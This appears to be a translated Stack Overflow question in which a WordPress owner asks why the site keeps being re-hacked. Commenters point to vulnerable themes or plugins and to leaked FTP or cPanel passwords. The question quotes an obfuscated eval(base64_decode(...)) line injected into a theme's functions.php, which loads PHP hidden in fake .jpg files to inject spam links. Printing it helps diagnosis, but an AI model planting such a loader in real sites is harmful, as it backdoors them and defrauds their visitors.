【发布时间】:2015-12-06 00:45:45
【问题描述】:
我有一个不断被黑客入侵的 Wordpress 网站。据我所知,正在进行以下更改:
此文件顶部有一些额外的 PHP 代码:
wp-content/themes/enfold/functions.php
如下:
eval(base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9b2Jfc3RhcnQoImNhbGxiYWNrIik7"));
并且正在创建 4 个新的 jpg 文件:
/wp-includes/images/geo.jpg
/wp-includes/images/save.jpg
/wp-includes/images/magic.jpg
/wp-includes/images/links.jpg
这些不是真正的 jpg 文件,因为它们不会打开,但使用文本编辑器查看它们会显示文本和其他 PHP 代码。
从 PHP 代码看来,它似乎正试图将一些垃圾邮件/广告链接注入我的 Wordpress 帖子中。
我不断删除这些文件,我安装了一个安全插件,删除了管理员登录,更改了我所有的密码,但这些文件每隔几天就会继续更新/创建。
我正在尝试了解这是如何实现的,以及接下来我需要做什么来阻止它。
【问题讨论】:
-
您是否使用 FTP 或 cPanel/etc 来访问服务器?有可能这些都受到了影响。
-
您可能有一个易受攻击的主题或插件。
-
我敢打赌你的主题或一些活动插件很容易受到攻击,我遇到过很多这样的网站,通常使用 5 年前创建的硬编码主题。
-
我同时使用 cPanel 和 FTP - 我将再次更改这些密码。我已经删除了除活动主题之外的所有主题,并拥有最少的插件集。有没有办法判断日志文件等可能受到的损害?
-
大概是you've followed the standard advice in the FAQ?因为除非您有一些您怀疑可以发布的特定代码,否则我们在这里无能为力。
标签: wordpress